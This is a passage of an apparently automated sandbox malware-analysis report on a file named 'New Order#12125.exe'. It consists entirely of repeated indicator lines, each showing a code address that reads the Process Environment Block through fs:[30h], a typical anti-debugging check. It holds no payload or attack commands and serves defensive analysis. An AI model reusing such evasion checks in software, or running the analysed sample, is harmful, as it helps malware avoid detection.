              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C5ED mov eax, dword ptr fs:[00000030h]0_2_0153C5ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C5ED mov eax, dword ptr fs:[00000030h]0_2_0153C5ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E59C mov eax, dword ptr fs:[00000030h]0_2_0153E59C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01502582 mov eax, dword ptr fs:[00000030h]0_2_01502582
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01502582 mov ecx, dword ptr fs:[00000030h]0_2_01502582
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01534588 mov eax, dword ptr fs:[00000030h]0_2_01534588
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015245B1 mov eax, dword ptr fs:[00000030h]0_2_015245B1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015245B1 mov eax, dword ptr fs:[00000030h]0_2_015245B1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152245A mov eax, dword ptr fs:[00000030h]0_2_0152245A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BA456 mov eax, dword ptr fs:[00000030h]0_2_015BA456
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F645D mov eax, dword ptr fs:[00000030h]0_2_014F645D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C460 mov ecx, dword ptr fs:[00000030h]0_2_0158C460
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A430 mov eax, dword ptr fs:[00000030h]0_2_0153A430
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FC427 mov eax, dword ptr fs:[00000030h]0_2_014FC427
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015004E5 mov ecx, dword ptr fs:[00000030h]0_2_015004E5
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BA49A mov eax, dword ptr fs:[00000030h]0_2_015BA49A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015344B0 mov ecx, dword ptr fs:[00000030h]0_2_015344B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158A4B0 mov eax, dword ptr fs:[00000030h]0_2_0158A4B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015064AB mov eax, dword ptr fs:[00000030h]0_2_015064AB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500750 mov eax, dword ptr fs:[00000030h]0_2_01500750
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542750 mov eax, dword ptr fs:[00000030h]0_2_01542750
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542750 mov eax, dword ptr fs:[00000030h]0_2_01542750
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E75D mov eax, dword ptr fs:[00000030h]0_2_0158E75D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01584755 mov eax, dword ptr fs:[00000030h]0_2_01584755
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153674D mov esi, dword ptr fs:[00000030h]0_2_0153674D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153674D mov eax, dword ptr fs:[00000030h]0_2_0153674D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153674D mov eax, dword ptr fs:[00000030h]0_2_0153674D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01508770 mov eax, dword ptr fs:[00000030h]0_2_01508770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510770 mov eax, dword ptr fs:[00000030h]0_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500710 mov eax, dword ptr fs:[00000030h]0_2_01500710
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01530710 mov eax, dword ptr fs:[00000030h]0_2_01530710
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C700 mov eax, dword ptr fs:[00000030h]0_2_0153C700
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157C730 mov eax, dword ptr fs:[00000030h]0_2_0157C730
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153273C mov eax, dword ptr fs:[00000030h]0_2_0153273C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153273C mov ecx, dword ptr fs:[00000030h]0_2_0153273C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153273C mov eax, dword ptr fs:[00000030h]0_2_0153273C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C720 mov eax, dword ptr fs:[00000030h]0_2_0153C720
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C720 mov eax, dword ptr fs:[00000030h]0_2_0153C720
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150C7C0 mov eax, dword ptr fs:[00000030h]0_2_0150C7C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015807C3 mov eax, dword ptr fs:[00000030h]0_2_015807C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015047FB mov eax, dword ptr fs:[00000030h]0_2_015047FB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015047FB mov eax, dword ptr fs:[00000030h]0_2_015047FB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E7E1 mov eax, dword ptr fs:[00000030h]0_2_0158E7E1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015227ED mov eax, dword ptr fs:[00000030h]0_2_015227ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015227ED mov eax, dword ptr fs:[00000030h]0_2_015227ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015227ED mov eax, dword ptr fs:[00000030h]0_2_015227ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A678E mov eax, dword ptr fs:[00000030h]0_2_015A678E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B47A0 mov eax, dword ptr fs:[00000030h]0_2_015B47A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015007AF mov eax, dword ptr fs:[00000030h]0_2_015007AF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151C640 mov eax, dword ptr fs:[00000030h]0_2_0151C640
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01532674 mov eax, dword ptr fs:[00000030h]0_2_01532674
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C866E mov eax, dword ptr fs:[00000030h]0_2_015C866E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C866E mov eax, dword ptr fs:[00000030h]0_2_015C866E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A660 mov eax, dword ptr fs:[00000030h]0_2_0153A660
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A660 mov eax, dword ptr fs:[00000030h]0_2_0153A660
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542619 mov eax, dword ptr fs:[00000030h]0_2_01542619
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151260B mov eax, dword ptr fs:[00000030h]0_2_0151260B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E609 mov eax, dword ptr fs:[00000030h]0_2_0157E609
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01536620 mov eax, dword ptr fs:[00000030h]0_2_01536620
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538620 mov eax, dword ptr fs:[00000030h]0_2_01538620
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E627 mov eax, dword ptr fs:[00000030h]0_2_0151E627
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150262C mov eax, dword ptr fs:[00000030h]0_2_0150262C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0153A6C7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A6C7 mov eax, dword ptr fs:[00000030h]0_2_0153A6C7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015806F1 mov eax, dword ptr fs:[00000030h]0_2_015806F1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015806F1 mov eax, dword ptr fs:[00000030h]0_2_015806F1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504690 mov eax, dword ptr fs:[00000030h]0_2_01504690
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504690 mov eax, dword ptr fs:[00000030h]0_2_01504690
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015366B0 mov eax, dword ptr fs:[00000030h]0_2_015366B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C6A6 mov eax, dword ptr fs:[00000030h]0_2_0153C6A6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4940 mov eax, dword ptr fs:[00000030h]0_2_015D4940
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01580946 mov eax, dword ptr fs:[00000030h]0_2_01580946
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A4978 mov eax, dword ptr fs:[00000030h]0_2_015A4978
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A4978 mov eax, dword ptr fs:[00000030h]0_2_015A4978
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C97C mov eax, dword ptr fs:[00000030h]0_2_0158C97C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E mov eax, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E mov edx, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E mov eax, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C912 mov eax, dword ptr fs:[00000030h]0_2_0158C912
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8918 mov eax, dword ptr fs:[00000030h]0_2_014F8918
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8918 mov eax, dword ptr fs:[00000030h]0_2_014F8918
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E908 mov eax, dword ptr fs:[00000030h]0_2_0157E908
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E908 mov eax, dword ptr fs:[00000030h]0_2_0157E908
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158892A mov eax, dword ptr fs:[00000030h]0_2_0158892A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0159892B mov eax, dword ptr fs:[00000030h]0_2_0159892B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015349D0 mov eax, dword ptr fs:[00000030h]0_2_015349D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CA9D3 mov eax, dword ptr fs:[00000030h]0_2_015CA9D3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015969C0 mov eax, dword ptr fs:[00000030h]0_2_015969C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015329F9 mov eax, dword ptr fs:[00000030h]0_2_015329F9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015329F9 mov eax, dword ptr fs:[00000030h]0_2_015329F9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E9E0 mov eax, dword ptr fs:[00000030h]0_2_0158E9E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015889B3 mov esi, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015889B3 mov eax, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015889B3 mov eax, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015009AD mov eax, dword ptr fs:[00000030h]0_2_015009AD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015009AD mov eax, dword ptr fs:[00000030h]0_2_015009AD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01530854 mov eax, dword ptr fs:[00000030h]0_2_01530854
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504859 mov eax, dword ptr fs:[00000030h]0_2_01504859
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504859 mov eax, dword ptr fs:[00000030h]0_2_01504859
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01512840 mov ecx, dword ptr fs:[00000030h]0_2_01512840
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596870 mov eax, dword ptr fs:[00000030h]0_2_01596870
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596870 mov eax, dword ptr fs:[00000030h]0_2_01596870
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E872 mov eax, dword ptr fs:[00000030h]0_2_0158E872
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E872 mov eax, dword ptr fs:[00000030h]0_2_0158E872
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C810 mov eax, dword ptr fs:[00000030h]0_2_0158C810
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A483A mov eax, dword ptr fs:[00000030h]0_2_015A483A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A483A mov eax, dword ptr fs:[00000030h]0_2_015A483A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A830 mov eax, dword ptr fs:[00000030h]0_2_0153A830
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov ecx, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E8C0 mov eax, dword ptr fs:[00000030h]0_2_0152E8C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D08C0 mov eax, dword ptr fs:[00000030h]0_2_015D08C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C8F9 mov eax, dword ptr fs:[00000030h]0_2_0153C8F9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C8F9 mov eax, dword ptr fs:[00000030h]0_2_0153C8F9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CA8E4 mov eax, dword ptr fs:[00000030h]0_2_015CA8E4
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C89D mov eax, dword ptr fs:[00000030h]0_2_0158C89D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500887 mov eax, dword ptr fs:[00000030h]0_2_01500887
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AEB50 mov eax, dword ptr fs:[00000030h]0_2_015AEB50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B4B4B mov eax, dword ptr fs:[00000030h]0_2_015B4B4B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B4B4B mov eax, dword ptr fs:[00000030h]0_2_015B4B4B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A8B42 mov eax, dword ptr fs:[00000030h]0_2_015A8B42
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596B40 mov eax, dword ptr fs:[00000030h]0_2_01596B40
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596B40 mov eax, dword ptr fs:[00000030h]0_2_01596B40
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CAB40 mov eax, dword ptr fs:[00000030h]0_2_015CAB40
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8B50 mov eax, dword ptr fs:[00000030h]0_2_014F8B50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FCB7E mov eax, dword ptr fs:[00000030h]0_2_014FCB7E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4B00 mov eax, dword ptr fs:[00000030h]0_2_015D4B00
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152EB20 mov eax, dword ptr fs:[00000030h]0_2_0152EB20
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152EB20 mov eax, dword ptr fs:[00000030h]0_2_0152EB20
